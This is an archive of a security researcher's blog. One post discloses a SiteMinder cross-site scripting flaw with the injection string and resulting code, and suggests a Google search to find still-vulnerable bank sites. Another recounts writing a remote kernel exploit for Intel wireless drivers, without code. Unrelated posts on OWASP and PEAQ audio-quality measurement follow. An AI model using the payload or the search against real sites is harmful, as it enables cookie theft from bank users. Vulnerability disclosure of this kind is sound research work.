Monday, July 27, 2009

Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting

CA Siteminder is a centralized Web access management system that enables user authentication and single sign-on, authentication management, policy-based authorization, identity federation and auditing of access to Web applications and portals.

During a pentest activity at the end of 2007 I met this product so I started out to analyse its html source code. The following Javascript code got my attention:

function resetCredFields()
{
    if (X == 0 || X == 4 || X == 5 || X == 28 || X == 30 )
    {
        document.PWChange.PASSWORD.value = '';
    }
    else if (X == 1 || X == 18 || X == 20 || X == 22 || X == 31 || X == 34)
    {
        document.PWChange.NEWPASSWORD.value = '';
        document.PWChange.CONFIRMATION.value = '';
    }
}                                       

The value "X" is under the user control and could be used to inject arbitrary code into the resetCredFields() javascript function. Unfortunately the filters applied deny the submission of common XSS chars such as "<" or ">". At first sight it seemed to be not vulnerable to injection but after a few reasoning I deducted that a way would has been possible. A malicious Javascript code could be injected in a recursive manner into the original code. Due to the necessity to drop a part of the original code after the injection I thought to insert a code such as the following into the SMAUTHREASON parameter:

1)alert(document.cookie);}function+drop(){if(0

In this way the resulting injected code appear like the following:

function resetCredFields()
{

if (1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 0 || 1)
{
alert(document.cookie);
}
}
function drop(){

if( 0 == 4 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 5 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 28 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 1 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 18 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 20 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 22 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 31 || 1)
{
alert(document.cookie);
}
}
function drop(){

if( 0 == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
...
<BODY bgcolor='#ffffff' text='#000000' onLoad = 'resetCredFields();'>

At the execution point of resetCredFields() function the execution of our arbitrary javascript code will be granted.

An attacker could use this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site,once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

Unfortunately no remedy is available as of June 27th 2009 and several banking and financial institutions are still vulnerable to that vulnerability. Try to search the string inurl:"smpwservices.fcc" through google...the proof of the pudding.



Related links
http://www.securityfocus.com/bid/26375
http://supportconnectw.ca.com/public/antivirus/infodocs/casiteminder-secnotice.asp
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5923
http://xforce.iss.net/xforce/xfdb/38395

Saturday, May 23, 2009

Intel Centrino wireless drivers fail to properly process malformed frames

In early August of 2006 a researcher at SecureWorks said he had revealed a vulnerability in Apple's MacBook wireless software driver that would allow him to take control of the machine. While the researcher did find a vulnerability, he was using a third-party wireless driver. David Maynor and Johnny Cache demonstrated the vulnerability at the Black Hat conference on 1st August using a MacBook and an external USB plugged in wireless card .
I was looking for a way to penetrate in a protected wireless network and this method sounded good. Unfortunately there wasn't any details about the vulnerability and any publicly-available exploit. Moreover, the researchers demonstrate the vulnerability in Mac OS X and I was not sure that the bug could be exploitable in Microsoft Windows operative system.

So I decided to try to trigger the vulnerability in Microsoft Windows and to write my own exploit. A security bulletin was made public by Intel on 12th January 2007, it was INTEL-SA-00001 and looks like the following:

"Security vulnerabilities exist in the Microsoft* Windows* drivers for the Intel 2200BG and 2915ABG PRO/Wireless Network Connection Hardware because of the way that they currently handle certain frames. An attacker could potentially exploit these vulnerabilities which could potentially lead to remote code execution and system control. Security vulnerabilities have been identified in the Microsoft* Windows* drivers for the Intel 2200BG and 2915ABG PRO/Wireless Network Connection Hardware (w22n50.sys, w22n51.sys, w29n50.sys, w29n51.sys), which could potentially be exploited by attackers within range of the Wi-Fi station to execute arbitrary code on the target system with kernel-level privileges. These flaws are due to a memory corruption while parsing certain frames.".

Analyzing the driver w22n51.sys provided with the Intel 2200BG integrated wireless adapter, after a few days of work I found a way to execute a little portion of code "beep shellcode" through a stack overflow that allowed me a remote code execution in Microsoft Windows kernel mode. The stack overflow was triggered when a 802.11 Probe response frame was received with a multi vendorspecific tag and "x00" was set as essid and essid length element. After that I decided to publish a PoC exploit on milw0rm website. Unfortunately, the space I found to place the shellcode in memory was very small and the code I have been able to inject was limited to a code that reproduces a system bell.

Finally, after a few weeks of works I found a way to execute a more useful shellcode that allowed me to download and execute an executable file into the attacked machine.

After a few months of private keeping I finally disclosed the fully working exploit and published it on 17th April 2008 on milw0rm website as a metasploit framework plug in.



Related links

http://www.kb.cert.org/vuls/id/524332
http://spool.metasploit.com/pipermail/framework/2008-March/003337.html
http://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00001&languageid=en-fr
http://www.milw0rm.org/exploits/3158

Monday, December 22, 2008

OWASP Backend Security Project

Check out this SlideShare Presentation:

Thursday, December 1, 2005

PEAQ: Perceptual Evaluation Audio Quality

Introduction
Audio quality is one of the key factors when designing a digital system for broadcasting. The rapid introduction of various bit-rate reduction schemes has led to significant efforts in establishing and refining procedures for subjective assessments, simply because formal listening tests have been the only relevant method for judging audio quality.
The experience gained was the foundation for Recommendation ITU-R BS.1116, which then became the basis for most listening tests of this type.
Since subjective quality assessments are both time consuming and expensive, it is desirable to develop an objective measurement method in order to produce an estimate of the audio quality.

Traditional objective measurement methods, like Signal-to-Noise-Ratio (S/N) or Total-Harmonic-Distortion (THD) have never really been shown to relate reliably to the perceived audio quality. The problems become even more evident when the methods are applied on modern codecs which are both non-linear and non-stationary.
A number of methods for making objective perceptual measurements of perceived audio quality have been introduced during the last decade. But none of the methods were thoroughly validated, and consequently neither standardized nor widely accepted. In 1994, ITU-R identified an urgent need to establish a standard in this area and the work was initiated.
An open call for proposals was issued and the following six candidates for measurement methods were received: Disturbance Index (DIX), Noise-to-Mask Ratio (NMR), Perceptual Audio Quality Measure (PAQM), Perceptual Evaluation (PERCEVAL), Perceptual Objective Measure (POM) and The Toolbox Approach.

The measurement method in this Recommendation is the result of a process where the performance of each of the above six methods was studied, and the most promising tools extracted and integrated into one single method. The recommended method has been carefully validated at a number of test sites. It has proven to generate both reliable and useful information for several applications. One must, however, keep in mind that the objective measurement method in this Recommendation is not generally a substitute for arranging a formal listening test.

How PEAQb works
The test items were selected from Database 3 (DB3), which was used for the validation of the models. To simplify testing, a subset of the 84 items of DB3 was selected.
This subset consists of 16 items. The major criterion for the selection was that the resulting MOVs and DI (Distortion Index) values cover a broad range.

The test items are available from the ITU-R as WAV-files (Microsoft RIFF format) on a CD-ROM. All items were sampled at 48 kHz, 16-bit PCM. The reference and test signals as provided by the ITU are already time and level adapted to each other, so that no additional gain or delay compensation is required.

The measurement algorithm must be adjusted to a listening level of 92 dB SPL.

In order to conform to the Recommendation, the calculated DI values must reproduce the values given in Tables 22 and 23, with a tolerance of less than 0.02 for all test items.
If an implementation does not produce results within this tolerance it does not conform to this Recommendation.


Example:

# ./peaqb
usage: ./peaqb